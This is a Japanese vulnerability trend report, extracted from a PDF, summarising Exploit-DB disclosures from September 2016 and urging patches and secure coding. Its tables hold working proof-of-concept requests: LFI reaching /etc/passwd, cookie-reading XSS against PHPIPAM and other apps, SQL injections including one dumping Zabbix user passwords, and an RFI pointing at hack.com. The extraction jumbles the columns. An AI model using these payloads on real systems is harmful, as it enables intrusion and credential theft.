Untitled

2016.09
EDB-Report
最新Web脆弱性トレンドレポート(2016.09)
2016.09.01~2016.09.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム
サマリー
2016年9月に公開されたExploit-DBの分析結果、クロスサイトスクリプティング(Cross Site Scripting、以下XSS)攻撃に対する脆弱報告件数が最も多かったです。発見されたXSS攻撃のほとんどは、オープンソースIP管理シス
テムであるPHPIPAMから発見されました。PHPIPAMから発見された攻撃を分析した結果、パラメータ値を変調させてスクリプトを挿入する単純な攻撃種類がほとんどでした。SQL Injection攻撃もPHPIAMから発見されましたが、
これも攻撃の危険度および難易度が高い攻撃ではありませんでした。しかし、脆弱性が発見されたページがかなり多く、追加的な攻撃にさらされる可能性があるので、PHPIPAMを使用する管理者はセキュアコーディングおよびセキュリ
ティアップデートが必要と見られます。また、今月はExponent CMSから特異なSQL Injection脆弱性が発見されました。ほとんどのSQL Injection攻撃は、パラメータ値を狙うようになっていましたが、今回発見された脆弱性は、
一般的なパラメータキーや値の構造ではなく、URL経路に攻撃するパターンでした。これは一般的には成功できない脆弱性だが、サイトの構造によって攻撃が成功できる脆弱性です。Exponent CMSと同じく、サイトにURL経路を
利用してどのような行為をするなら、必ず注意しなければならない部分であるため、関連攻撃コードを参考にして脆弱性が露出されないよう注意しなければなりません。
脆弱性別報告件数
1. 脆弱性別件数
脆弱性カテゴリ
ローカルファイル挿入
(Local File Inclusion:LFI)
リモートファイル挿入
(Remote File Inclusion:RFI)
ディレクトリトラバーサル
(Directory Traversal)
SQL インジェクション
(SQL Injection)
クロスサイトスクリプティング
(Cross Site Scripting : XSS)
合計
件数
30
1
25
1
20
1
15
10
7
5
26
0
36
ローカルファイル挿入
(Local File Inclusion:LFI)
ディレクトリトラバーサル
(Directory Traversal)
リモートファイル挿入
(Remote File Inclusion:RFI)
SQL インジェクション
(SQL Injection)
クロスサイトスクリプティング
(Cross Site Scripting : XSS)
危険度別件数
2. 危険度別件数
危険度
早急対応要
高
合計
件数
割合
2
34
36
6%
94%
100%
2
早急対応要
高
34
3. 攻撃実行の難易度別件数
難易度
件数
割合
難
中
易
合計
2
1
33
36
6%
3%
92%
100%
攻撃実行の難易度別件数
2 1
難
中
易
33
4. 主なソフトウェア別脆弱性発生件数
ソフトウェア名
PHPIPAM
Kajona
Jobberbase
Joomla
Wordpress
Matrimonial Website Script
Exponent CMS
Zabbix
AnoBBS
CumulusClips
件数
23
3
2
2
1
1
1
1
1
1
合計
36
主なソフトウェア別脆弱性発生件数
1
1
PHPIPAM
1
1 1
Kajona
1
Jobberbase
2
Joomla
Wordpress
2
Matrimonial Website Script
3
23
Exponent CMS
Zabbix
AnoBBS
CumulusClips
EDB-Report
最新Web脆弱性トレンドレポート(2016.09)
2016.09.01~2016.09.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2016-09-05
2016-09-06
2016-09-06
EDB番号
40333
40338
40338
脆弱性カテゴリ
LFI
SQL Injection
XSS
攻撃難脆弱性度
易
易
易
危険度
対象プログラム
対象環境
高
WordPress RB Agency Plugin /wp-content/plugins/rb2.4.7 - forcedownload.php LFI agency/ext/forcedownload.php?file=../../../../../../../../etc/pa
sswd
脆弱性
Wordpress
WordPress RB
Agency Plugin
2.4.7
高
POST /phpipam/app/tools/user-menu/user-edit.php
HTTP/1.1
Host:
PHPIPAM 1.2.1 - user-edit.php Content-Type: application/x-www-form-urlencoded
SQL Injection 脆弱性
real_name=phpIPAM+Admin&email=admin%40domain.lo
cal&password1=&password2=&mailNotify=No&mailChan
gelog=No&printLimit=30&lang=9'%20or%201=1--
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
高
2016-09-06
40338
XSS
易
高
2016-09-06
40338
XSS
易
高
2016-09-06
40338
XSS
易
高
2016-09-06
40338
XSS
易
高
2016-09-06
40338
XSS
易
高
2016-09-06
40338
XSS
易
高
2016-09-06
40338
XSS
易
高
脆弱性名
PHPIPAM 1.2.1 /phpipam/app/admin/subnets/e
dit.php XSS 脆弱性
40338
XSS
易
高
2016-09-06
40338
XSS
易
高
2016-09-06
40338
XSS
易
高
POST /phpipam/app/admin/subnets/edit.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
sectionId=2&subnetId=1&action=edit"><SCRIPT>ALERT(
DOCUMENT.COOKIE);</SCRIPT>
POST /phpipam/app/admin/widgets/edit.php HTTP/1.1
Host:
PHPIPAM 1.2.1 Content-Type: application/x-www-form-urlencoded
/phpipam/app/admin/widgets/e
dit.php XSS 脆弱性
wid=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
&action=edit
POST /phpipam/app/admin/scan-agents/edit.php
PHPIPAM 1.2.1 HTTP/1.1
/phpipam/app/admin/scan- Host:
agents/edit.php XSS 脆弱性 Content-Type: application/x-www-form-urlencoded
id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE)
POST /phpipam/app/admin/groups/edit-group.php
HTTP/1.1
PHPIPAM 1.2.1 Host:
/phpipam/app/admin/groups/e Content-Type: application/x-www-form-urlencoded
dit-group.php XSS 脆弱性
id=2"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&
action=edit
POST /phpipam/app/admin/users/edit.php HTTP/1.1
Host:
PHPIPAM 1.2.1 Content-Type: application/x-www-form-urlencoded
/phpipam/app/admin/users/edit
.php XSS 脆弱性
id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE)
PHPIPAM 1.2.1 /phpipam/app/admin/tags/edit.
php XSS 脆弱性
;</SCRIPT>
POST /phpipam/app/admin/tags/edit.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE)
;</SCRIPT>
POST /phpipam/app/admin/instructions/preview.php
HTTP/1.1
PHPIPAM 1.2.1 Host:
/phpipam/app/admin/instructio Content-Type: application/x-www-form-urlencoded
ns/preview.php XSS 脆弱性
instructions=You+can+write+instructions+under+admin+
menu!"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
POST /phpipam/app/admin/languages/edit.php HTTP/1.1
Host:
PHPIPAM 1.2.1 Content-Type: application/x-www-form-urlencoded
/phpipam/app/admin/sections/
edit.php XSS 脆弱性
2016-09-06
攻撃コード
sectionId=2"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SC
RIPT>&action=edit
POST /phpipam/app/admin/subnets/edit-folder.php
HTTP/1.1
Host:
PHPIPAM 1.2.1 Content-Type: application/x-www-form-urlencoded
/phpipam/app/admin/subnets/e
dit-folder.php XSS 脆弱性
sectionId=1&subnetId=5&action=edit"><SCRIPT>ALERT(
DOCUMENT.COOKIE);</SCRIPT>&location=IPaddresses
POST /phpipam/app/admin/devices/edit.php HTTP/1.1
Host:
PHPIPAM 1.2.1 Content-Type: application/x-www-form-urlencoded
/phpipam/app/admin/devices/e
dit.php XSS 脆弱性
switchId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.C
OOKIE);</SCRIPT>
POST /phpipam/app/admin/device-types/edit.php
HTTP/1.1
PHPIPAM 1.2.1 Host:
/phpipam/app/admin/device- Content-Type: application/x-www-form-urlencoded
types/edit.php XSS 脆弱性
tid=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE
);</SCRIPT>
EDB-Report
最新Web脆弱性トレンドレポート(2016.09)
2016.09.01~2016.09.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2016-09-06
EDB番号
40338
脆弱性カテゴリ
XSS
攻撃難脆弱性度
易
危険度
高
2016-09-06
40338
XSS
易
高
2016-09-06
40338
XSS
易
高
2016-09-06
40338
XSS
易
高
2016-09-06
40338
XSS
易
高
2016-09-06
40338
XSS
易
高
脆弱性名
PHPIPAM 1.2.1 /phpipam/app/admin/vlans/edit
.php XSS 脆弱性
攻撃コード
POST /phpipam/app/admin/vlans/edit.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
vlanId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIP
T>&action=edit&vlanNum=
POST /phpipam/app/admin/vlans/edit-domain.php
HTTP/1.1
PHPIPAM 1.2.1 Host:
/phpipam/app/admin/vlans/edit Content-Type: application/x-www-form-urlencoded
-domain.php XSS 脆弱性
id="><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&a
ction=add
POST /phpipam/app/admin/nameservers/edit.php
HTTP/1.1
PHPIPAM 1.2.1 Host:
/phpipam/app/admin/nameserv Content-Type: application/x-www-form-urlencoded
ers/edit.php XSS 脆弱性
nameserverId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);
</SCRIPT>&action=edit
POST /phpipam/app/admin/custom-fields/filter.php
HTTP/1.1
PHPIPAM 1.2.1 Host:
/phpipam/app/admin/custom- Content-Type: application/x-www-form-urlencoded
fields/filter.php XSS 脆弱性
table=ipaddresses"><SCRIPT>ALERT(DOCUMENT.COOKIE
);</SCRIPT>
POST /phpipam/app/admin/replace-fields/result.php
HTTP/1.1
Host:
PHPIPAM 1.2.1 Content-Type: application/x-www-form-urlencoded
/phpipam/app/admin/replacefields/result.php XSS 脆弱性
field=description"><SCRIPT>ALERT(DOCUMENT.COOKIE);
</SCRIPT>&search=a&csrf_cookie=892d2a900ec7fc1ba94
86ec171a36f71&replace=a
POST /phpipam/app/admin/subnets/edit.php HTTP/1.1
Host:
PHPIPAM 1.2.1 Content-Type: application/x-www-form-urlencoded
/phpipam/app/admin/subnets/e
dit.php XSS 脆弱性
sectionId=1&subnetId=6&action=edit&location=IPaddres
ses"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>
POST /phpipam/app/admin/subnets/edit-folder.php
HTTP/1.1
PHPIPAM 1.2.1 Host:
/phpipam/app/admin/subnets/e Content-Type: application/x-www-form-urlencoded
dit-folder.php XSS 脆弱性
sectionId=2&subnetId="><SCRIPT>ALERT(DOCUMENT.C
OOKIE);</SCRIPT>&action=add&location=IPaddresses
POST /phpipam/app/tools/devices/devices-print.php
HTTP/1.1
PHPIPAM 1.2.1 Host:
/phpipam/app/tools/devices/de Content-Type: application/x-www-form-urlencoded
vices-print.php XSS 脆弱性
ffield=hostname"><SCRIPT>ALERT(DOCUMENT.COOKIE);
</SCRIPT>&fval=a&direction=hostname%7Casc
POST /phpipam/app/tools/subnet-masks/popup.php
HTTP/1.1
PHPIPAM 1.2.1 Host:
/phpipam/app/tools/subnet- Content-Type: application/x-www-form-urlencoded
masks/popup.php XSS 脆弱性
closeClass=hidePopups"><SCRIPT>ALERT(DOCUMENT.CO
OKIE);</SCRIPT>
2016-09-06
40338
XSS
易
高
2016-09-06
40338
XSS
易
高
2016-09-06
40338
XSS
易
高
2016-09-06
40338
XSS
易
高
PHPIPAM 1.2.1 - /phpipam/
XSS 脆弱性
2016-09-06
40338
SQL Injection
易
高
PHPIPAM 1.2.1 - /phpipam/
SQL Injection 脆弱性
/phpipam/?page=tools&section=changelog&subnetId=a
&sPage=50"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SC
RIPT>
/phpipam/?page=tools&section=changelog&subnetId=a
&sPage=50'%20or%201=1--
対象プログラム
対象環境
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
PHPIPAM
PHPIPAM
1.2.1
EDB-Report
最新Web脆弱性トレンドレポート(2016.09)
2016.09.01~2016.09.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2016-09-07
EDB番号
40343
脆弱性カテゴリ
XSS
攻撃難脆弱性度
易
危険度
高
脆弱性名
攻撃コード
対象プログラム
対象環境
CumulusClips
CumulusClips
2.4.1
Jobberbase
Jobberbase
2.0
Jobberbase
Jobberbase
2.0
Zabbix
Zabbix 2.0
POST
/progs/bbs_auth.php?prog_dir=http://hack.com/index.php
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
AnoBBS
AnoBBS 1.0.1
/kajona/xml.php?admin=1&module=messaging&action=s
aveConfigAjax&systemid=&class_messageprovider_excepti
ons_enabled=false<a
Kajona 4.7 - xml.php XSS 脆弱
xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fx
性
html'><a%3abody
onload%3d'alert(1)'%2f><%2fa>&messageprovidertype=c
lass_messageprovider_exceptions
Kajona
Kajona 4.7
Kajona
Kajona 4.7
Kajona
Kajona 4.7
Exponent
CMS
Exponent
CMS 2.3.9
Joomla
Joomla
Component
Huge-IT
Video Gallery
1.0.9
POST / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Chrome/16.0.912.75 Safari/535.7
Accept: */*
CumulusClips 2.4.1 Content-Type: application/x-www-form-urlencoded;
/cumulusclips/account/videos/e
charset=UTF-8
dit/1358/ XSS 脆弱性
title=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&
tags=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E
&cat_id=1&description=www%3Cscript%3Ealert%281%29
%3C%2Fscript%3E&private_url=DyZbn8m&submitted=TR
UE&button=Update+Video
2016-09-08
2016-09-08
40351
40351
XSS
XSS
易
易
高
高
/api/api.php?action=getJobs&type=0&category=0&count
Jobberbase 2.0 - api.php SQL
=5&random=1&days_behind=1'%20and%201=1-Injection 脆弱性
&response=js
POST /admin/ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko
Jobberbase 2.0 - /admin/ XSS Chrome/16.0.912.75 Safari/535.7
脆弱性
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
username="><script>alert(1)</script>
jsrpc.php?sid=0bcd4ade648214dc&type=9&method=scre
en.get&timestamp=1471403798083&mode=2&screenid=
2016-09-08
40353
SQL Injection
難
早急対応要
Zabbix 2.0 - 3.0.3 - SQL
Injection
&groupid=&hostid=0&pageFile=history.php&profileIdx=
web.item.graph&profileIdx2=%28select%201%20from%20
%28select%20count%28%2A%29%2Cconcat%28%28select
%28select%20concat%28cast%28concat%28alias%2C0x7e
%2Cpasswd%2C0x7e%29%20as%20char%29%2C0x7e%29
%29%20from%20zabbix.users%20LIMIT%20%22%2Bstr%2
8userid1%29%2B%22%2C1%29%2Cfloor%28rand%280%29%2A2
%29%29x%20from%20information_schema.tables%20grou
p%20by%20x%29a%29&updateProfile=true&screenitemid
=&period=3600&stime=20160817050632&resourcetype=
17&itemids[23297]=23297&action=showlatest&filter=&fil
ter_task=&mark_color=1
2016-09-16
40388
RFI
易
高
2016-09-19
40395
XSS
易
高
2016-09-19
40395
Directory
Traversal
易
高
2016-09-19
40395
XSS
易
高
2016-09-22
40412
SQL Injection
中
高
2016-09-22
2016-09-22
2016-09-26
40413
40416
40423
SQL Injection
SQL Injection
SQL Injection
易
難
易
高
AnoBBS 1.0.1 - bbs_auth.php
RFI 脆弱性
Kajona 4.7 - image.php
/kajona/image.php?image=/files/images/upload/....//....//....
Directory Traversal 脆弱性
//download.php&maxWidth=20&maxHeight=2
Kajona 4.7 - index.php XSS 脆 /kajona/index.php?admin=1&module=search&action=sea
弱性
rch&peClose=1&peRefreshPage=';alert(1);foo='
Exponent CMS 2.3.9 /exponent/index.php'%20or%201%3d1--%20
index.php SQL Injection 脆弱性
/index.php?option=com_eventbooking&view=calendar&la
Joomla Component Huge-IT yout=weekly&date=1%20or%201=1--&Itemid=354
Video Gallery 1.0.9 - index.php
SQL Injection 脆弱性
/viewfullprofile1.php?id=MM57711%20and%20%2F*%213
0000if%28exists%28select%20concat%280x7233646D3076
Matrimonial Website Script
Matrimonial
335F73716C5F696E6A656374696F6E%2Ccount%28*%29%
早急対応要 1.0.2 - viewfullprofile1.php SQL
Website
29%20from%20%3F%3F%3F.%E7%AE%A1%E7%90%86%E
Injection 脆弱性
Script
5%91%98%29%2CBENCHMARK%281161102%2C8%2CMD
5%280x41%29%29%2C0%29*%2F
/index.php?option=com_eventbooking&view=calendar&la
yout=weekly&date=1%20or%201=1--&Itemid=354
Joomla! Component Event
高
Booking 2.10.1 - index.php SQL
Injection 脆弱性
Joomla
Matrimonial
Website
Script 1.0.2
Joomla!
Component
Event Booking
2.10.1